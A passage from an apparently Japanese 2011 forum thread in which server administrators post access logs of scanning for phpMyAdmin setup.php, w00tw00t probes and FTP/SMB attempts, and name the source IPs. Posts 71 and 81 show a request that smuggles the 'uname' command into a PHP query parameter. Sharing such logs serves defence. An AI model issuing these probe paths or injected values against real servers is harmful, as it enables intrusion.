113.140.75.222 [2011.4/03-19:45:59 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:46:00 +0900] "GET //pma/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:46:05 +0900] "GET //dbadmin/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:46:11 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:46:17 +0900] "GET //phppgadmin/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:46:23 +0900] "GET //PMA/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:46:29 +0900] "GET //admin/ HTTP/1.1" 404 REF:-
113.140.75.222 [2011.4/03-19:46:35 +0900] "GET //MyAdmin/ HTTP/1.1" 404 REF:-
212.58.96.55 [2011.4/13-01:55:54 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:-
212.58.96.55 [2011.4/13-01:55:54 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:-
212.58.96.55 [2011.4/13-01:55:55 +0900] "GET //MyAdmin/ HTTP/1.1" 404 REF:-
212.58.96.55 [2011.4/13-01:56:01 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:-
212.58.96.55 [2011.4/13-01:56:07 +0900] "GET //pma/ HTTP/1.1" 404 REF:-
212.58.96.55 [2011.4/13-01:56:13 +0900] "GET //mysql/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:03 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:04 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:05 +0900] "GET //pma/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:10 +0900] "GET //dbadmin/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:16 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:22 +0900] "GET //phppgadmin/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:28 +0900] "GET //PMA/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:34 +0900] "GET //admin/ HTTP/1.1" 404 REF:-
58.83.227.150 [2011.4/13-22:18:41 +0900] "GET //MyAdmin/ HTTP/1.1" 404 REF:-
123.30.109.21 [2011.4/20-13:22:53 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
123.30.109.21 [2011.4/20-13:22:52 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
123.30.109.21 [2011.4/30-00:16:47 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
123.30.109.21 [2011.4/30-00:16:48 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
123.30.109.21 [2011.4/30-00:16:48 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
113.57.252.72 [2011.5/04-11:08:05 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
113.57.252.72 [2011.5/04-11:08:05 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:-
113.57.252.72 [2011.5/04-11:08:06 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
113.57.252.72 [2011.5/04-11:08:07 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:-
113.57.252.72 [2011.5/04-11:08:12 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:-
62DNS未登録さん:2011/05/05(木) 14:25:19.93 ID:???
phpadminの何を狙ってるんだろう?
63DNS未登録さん:2011/05/05(木) 18:24:15.73 ID:GKw/2hw5
phpMyAdminのsetup.phpのセキュリティホールで任意のコマンドが実行できるらしい
http://www.nttdata-sec.co.jp/article/vulner/pdf/report20090615.pdf
64DNS未登録さん:2011/05/05(木) 21:15:53.74 ID:9a2Rswqc
http://metalgeargadaisuki.blog6.fc2.com/
65DNS未登録さん:2011/05/05(木) 21:59:47.81 ID:GKw/2hw5
googlebotから謎のアクセス
なんだこれ。。。

66.249.69.28 - - [05/May/2011:20:52:21 +0900] "GET /upload/viewer_board/wdviewer.exe HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.28 - - [05/May/2011:20:52:24 +0900] "GET /upload/viewer_board/HwpViewer2007.exe HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.73 - - [05/May/2011:20:52:24 +0900] "GET /upload/viewer_board/AdbeRdr70_kor_full.exe HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.28 - - [05/May/2011:20:52:25 +0900] "GET /upload/viewer_board/Hunv2k.exe HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66DNS未登録さん:2011/05/05(木) 22:23:16.36 ID:???
GooglebotってそんなUAだったか?
67DNS未登録さん:2011/05/06(金) 05:46:41.50 ID:???
そうだよ
68DNS未登録さん:2011/05/06(金) 08:09:26.86 ID:???
1年前に削除したKENTWEBのcgiに向かって、今でも毎日数十アクセスある。
apacheのアクセスログもエラーログも、404やら、File does not existのエラーメッセージでいっぱいwww
IP分散SEOの業者だと思うが、IPをランダム変化させながら広告を発射してくるので、iptablesに都度登録するスクリプトいれても
全くもってリソースの無駄。指定したアドレス(削除されたcgi)にアクセスしたIPはDROPするよう自動登録してるが、もう9000件を超えて
iptablesに食わせる、こっちのメモリリソースが無駄な気がしてきた。

最近のご丁寧に、リファラも指定して打ち込んでくるようになった。殺すぞwwwwww
http://link.iclub.to/0791597/
http://link.iclub.to/0933/
http://link.iclub.to/13571357/
http://link.iclub.to/nasato/
http://link.iclub.to/neko38/
http://link2.iclub.to/0762609/
http://link3.iclub.to/2264770/
http://link3.iclub.to/2889785/
http://link3.iclub.to/36912/
http://link4.iclub.to/kabu/
http://link6.iclub.to/uru80ta/
69DNS未登録さん:2011/05/21(土) 03:51:47.10 ID:???
113.33.224.197
ftpアタきたんだけど、リモートデスクトップ開放してるが大丈夫なのかこれ
70DNS未登録さん:2011/05/21(土) 22:00:06.50 ID:???
208.51.40.50
ずーとポートスキャンしてきてた
このIPアドレスを調べたら中国の新聞(?)サイトらしき所に行き着いたけれど、クラックでもされてるんかな
71DNS未登録さん:2011/06/16(木) 12:49:35.68 ID:???
85.25.131.109 - - [16/Jun/2011:03:21:39 +0900] "GET /admin/Y-ivrrecording.php?php=info&ip=uname HTTP/1.1" 404 385 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0"

最近、3日おきぐらいにY-ivrrecording.phpへのアクセスしてくるようになった
そんなファイル置いてないけど
72DNS未登録さん:2011/06/17(金) 12:29:38.41 ID:???
今こいつが来とる
66.241.100.228
内容は>>61と同じ
73DNS未登録さん:2011/06/18(土) 10:11:08.72 ID:/Zs3Wyia
182.164.91.73
74戦士カンガイバー ◆DMLinuxPbA :2011/06/18(土) 19:13:40.51 ID:???
新たなインジェクション攻撃、すでに3万サイトが感染か
http://hibari.2ch.net/test/read.cgi/pcnews/1308317712/
75DNS未登録さん:2011/07/05(火) 20:50:58.46 ID:???
219.135.253.80(80.253.135.219.broad.gz.gd.dynamic.163data.com.cn)

中国から
FTPにAdministratorでログインしようとしてた
76DNS未登録さん:2011/07/07(木) 21:05:14.45 ID:???
114.173.176.253 p17253-ipngn100102okayamaima.okayama.ocn.ne.jp
114.174.207.4 p12004-ipngn100105osakakita.osaka.ocn.ne.jp
114.174.253.34 p14034-ipngn100108osakakita.osaka.ocn.ne.jp
114.173.15.191 p12191-ipngn100403kobeminato.hyogo.ocn.ne.jp
114.173.137.79 p18079-ipngn100204niho.hiroshima.ocn.ne.jp

1日20〜30回TCP445への接続を試みてくる
そろそろうざい
77DNS未登録さん:2011/07/10(日) 11:30:43.71 ID:???
一日50〜120くらいftpにattackくるな
swatchで叩き落としてるが
78DNS未登録さん:2011/07/12(火) 20:08:52.57 ID:???
次スレのスレタイはこうなるの?
アタックNo2してきたIPを晒すスレ
79DNS未登録さん:2011/07/14(木) 12:51:48.45 ID:???
アタックチャンス
80DNS未登録さん:2011/07/15(金) 23:12:58.75 ID:???
適当なところが見つからなかったんで。最近になって、

125.175.54.138 - - [15/Jul/2011:03:32:55 +0900] "GET /you/new.htm HTTP/1.1" 200 55472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
125.175.54.138 - - [15/Jul/2011:03:32:56 +0900] ↑
125.175.54.138 - - [15/Jul/2011:03:32:56 +0900] ↑
125.175.54.138 - - [15/Jul/2011:03:35:02 +0900] ↑
125.175.54.138 - - [15/Jul/2011:03:35:03 +0900] ↑
125.175.54.138 - - [15/Jul/2011:03:35:03 +0900] ↑
・・・以下延々と続く・・・

というログが目に付くようになった。ソースIPは日本国内。
アクセス先のURLは正しいURLなんだが、中に張ってある画像へのアクセスはなく、
このページだけ何度もアクセスしてくる。refererもなし。
特徴として、必ず3回ひとまとめでアクセスがあって、
その後100秒〜200秒して次のアクセスがある。
・・・なんだろう? これ。
81 忍法帖【Lv=19,xxxPT】 :2011/07/16(土) 03:55:54.68 ID:???
31.25.136.18 - - [21/Jun/2011:19:48:48 +0900] "GET /admin/Y-ivrrecording.php?php=info&ip=uname HTTP/1.1" 403 1506
193.227.186.153 - - [21/Jun/2011:14:05:16 +0900] "GET /admin/config.php HTTP/1.1" 403 1506

この2つのPHPに最近よくアクセスくるな。
置いてないのに。
JPまたは逆引き出来ないHOSTからは弾いてるんだけど、404返したほうがいいのかな
82DNS未登録さん:2011/07/17(日) 05:23:37.95 ID:???
>>80
URLから察するに、何かの更新情報とかを書いてるページ?
だとしたらスクレイピング目的のアクセスだと思う
実際どんなページなのかわからんから憶測だけど、たぶん悪意はないと思うよ

>>81
その手のはbotだから404返したところで無意味
8380:2011/07/17(日) 20:59:14.77 ID:???
>>82
更新情報と、あとリンク集のページにも似たようなアクセスがある。

意外に、referer spamばら撒くプログラムが動いてるけど、
セキュリティソフトがreferer止めてるとか・・・。
でもreferer spamはもうちょっと挙動が違うんだよな。
84DNS未登録さん:2011/07/18(月) 18:07:19.66 ID:???
リファラスパムにしては間隔がきっちりしすぎてると思う…

試しにHTMLの構造変えて様子見してみ
それでペースが崩れたり人の手でアクセスしてくるような痕跡があるかどうか
85DNS未登録さん:2011/08/02(火) 01:42:48.19 ID:???
68.169.42.240 - - [30/Jul/2011:23:34:52 +0900] "GET //scripts/setup.php HTTP/1.1" 404 215 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:52 +0900] "GET //admin/scripts/setup.php HTTP/1.1" 404 221 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:53 +0900] "GET //admin/pma/scripts/setup.php HTTP/1.1" 404 225 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:53 +0900] "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:53 +0900] "GET //db/scripts/setup.php HTTP/1.1" 404 218 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:54 +0900] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:54 +0900] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:54 +0900] "GET //mysql/scripts/setup.php HTTP/1.1" 404 221 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //phpadmin/scripts/setup.php HTTP/1.1" 404 224 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:55 +0900] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:56 +0900] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:56 +0900] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 404 227 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:56 +0900] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 404 227 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:57 +0900] "GET //pma/scripts/setup.php HTTP/1.1" 404 219 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:57 +0900] "GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 230 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:57 +0900] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //web/scripts/setup.php HTTP/1.1" 404 219 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 228 "-" "-"
86DNS未登録さん:2011/08/02(火) 01:43:02.02 ID:???
68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //websql/scripts/setup.php HTTP/1.1" 404 222 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:58 +0900] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:59 +0900] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:59 +0900] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 228 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:34:59 +0900] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 228 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:00 +0900] "GET //phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:01 +0900] "GET //phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:01 +0900] "GET //phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:01 +0900] "GET //phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:02 +0900] "GET //phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:02 +0900] "GET //phpMyAdmin-2.5.6-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:02 +0900] "GET //phpMyAdmin-2.5.6-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.5.6/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.5.7/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:03 +0900] "GET //phpMyAdmin-2.6.0-alpha/scripts/setup.php HTTP/1.1" 404 238 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:04 +0900] "GET //phpMyAdmin-2.6.0-alpha2/scripts/setup.php HTTP/1.1" 404 239 "-" "-"
87DNS未登録さん:2011/08/02(火) 01:43:14.21 ID:???
68.169.42.240 - - [30/Jul/2011:23:35:04 +0900] "GET //phpMyAdmin-2.6.0-beta1/scripts/setup.php HTTP/1.1" 404 238 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:04 +0900] "GET //phpMyAdmin-2.6.0-beta2/scripts/setup.php HTTP/1.1" 404 238 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:05 +0900] "GET //phpMyAdmin-2.6.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:05 +0900] "GET //phpMyAdmin-2.6.0-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:05 +0900] "GET //phpMyAdmin-2.6.0-rc3/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:06 +0900] "GET //phpMyAdmin-2.6.0-pl3/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:07 +0900] "GET //phpMyAdmin-2.6.1-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:07 +0900] "GET //phpMyAdmin-2.6.1-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:07 +0900] "GET //phpMyAdmin-2.6.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:08 +0900] "GET //phpMyAdmin-2.6.1-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:08 +0900] "GET //phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:08 +0900] "GET //phpMyAdmin-2.6.1-pl3/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:09 +0900] "GET //phpMyAdmin-2.6.2-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:09 +0900] "GET //phpMyAdmin-2.6.2-beta1/scripts/setup.php HTTP/1.1" 404 238 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:09 +0900] "GET //phpMyAdmin-2.6.2-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:10 +0900] "GET //phpMyAdmin-2.6.2/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:10 +0900] "GET //phpMyAdmin-2.6.2-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
88DNS未登録さん:2011/08/02(火) 01:43:38.88 ID:???
68.169.42.240 - - [30/Jul/2011:23:35:10 +0900] "GET //phpMyAdmin-2.6.3/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.3-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.3/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.3-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:11 +0900] "GET //phpMyAdmin-2.6.4-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:12 +0900] "GET //phpMyAdmin-2.6.4-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:12 +0900] "GET //phpMyAdmin-2.6.4-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:12 +0900] "GET //phpMyAdmin-2.6.4-pl3/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:13 +0900] "GET //phpMyAdmin-2.6.4-pl4/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:13 +0900] "GET //phpMyAdmin-2.6.4/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:13 +0900] "GET //phpMyAdmin-2.7.0-beta1/scripts/setup.php HTTP/1.1" 404 238 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0-pl1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0-pl2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:14 +0900] "GET //phpMyAdmin-2.7.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:15 +0900] "GET //phpMyAdmin-2.8.0-beta1/scripts/setup.php HTTP/1.1" 404 238 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:15 +0900] "GET //phpMyAdmin-2.8.0-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:15 +0900] "GET //phpMyAdmin-2.8.0-rc2/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:16 +0900] "GET //phpMyAdmin-2.8.0/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:16 +0900] "GET //phpMyAdmin-2.8.0.1/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
89DNS未登録さん:2011/08/02(火) 01:44:10.19 ID:???
68.169.42.240 - - [30/Jul/2011:23:35:16 +0900] "GET //phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.0.3/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.0.4/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.1-rc1/scripts/setup.php HTTP/1.1" 404 236 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:17 +0900] "GET //phpMyAdmin-2.8.1/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:18 +0900] "GET //phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.1" 404 232 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:18 +0900] "GET //phpMyAdmin-2.8.2.1/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:18 +0900] "GET //phpMyAdmin-2.8.2.2/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.8.2.3/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.8.2.4/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:19 +0900] "GET //phpMyAdmin-2.10.0.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:20 +0900] "GET //phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:20 +0900] "GET //phpMyAdmin-2.10.1.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:20 +0900] "GET //phpMyAdmin-2.10.2.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:21 +0900] "GET //phpMyAdmin-2.11.0.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:21 +0900] "GET //phpMyAdmin-2.11.1.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:21 +0900] "GET //phpMyAdmin-2.11.1.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.2.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
90DNS未登録さん:2011/08/02(火) 01:44:28.84 ID:???
68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.2.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:22 +0900] "GET //phpMyAdmin-2.11.2.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:23 +0900] "GET //phpMyAdmin-2.11.3.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:23 +0900] "GET //phpMyAdmin-2.11.4.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:23 +0900] "GET //phpMyAdmin-2.11.5.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:24 +0900] "GET //phpMyAdmin-2.11.5.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:24 +0900] "GET //phpMyAdmin-2.11.5.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:24 +0900] "GET //phpMyAdmin-2.11.6.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.7.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.7.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.8.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:25 +0900] "GET //phpMyAdmin-2.11.9.0/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:26 +0900] "GET //phpMyAdmin-2.11.9.1/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:26 +0900] "GET //phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:26 +0900] "GET //phpMyAdmin-2.11.9.3/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-2.11.9.4/scripts/setup.php HTTP/1.1" 404 235 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-3.0.0.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-3.0.1.0/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
68.169.42.240 - - [30/Jul/2011:23:35:27 +0900] "GET //phpMyAdmin-3.0.1.1/scripts/setup.php HTTP/1.1" 404 234 "-" "-"
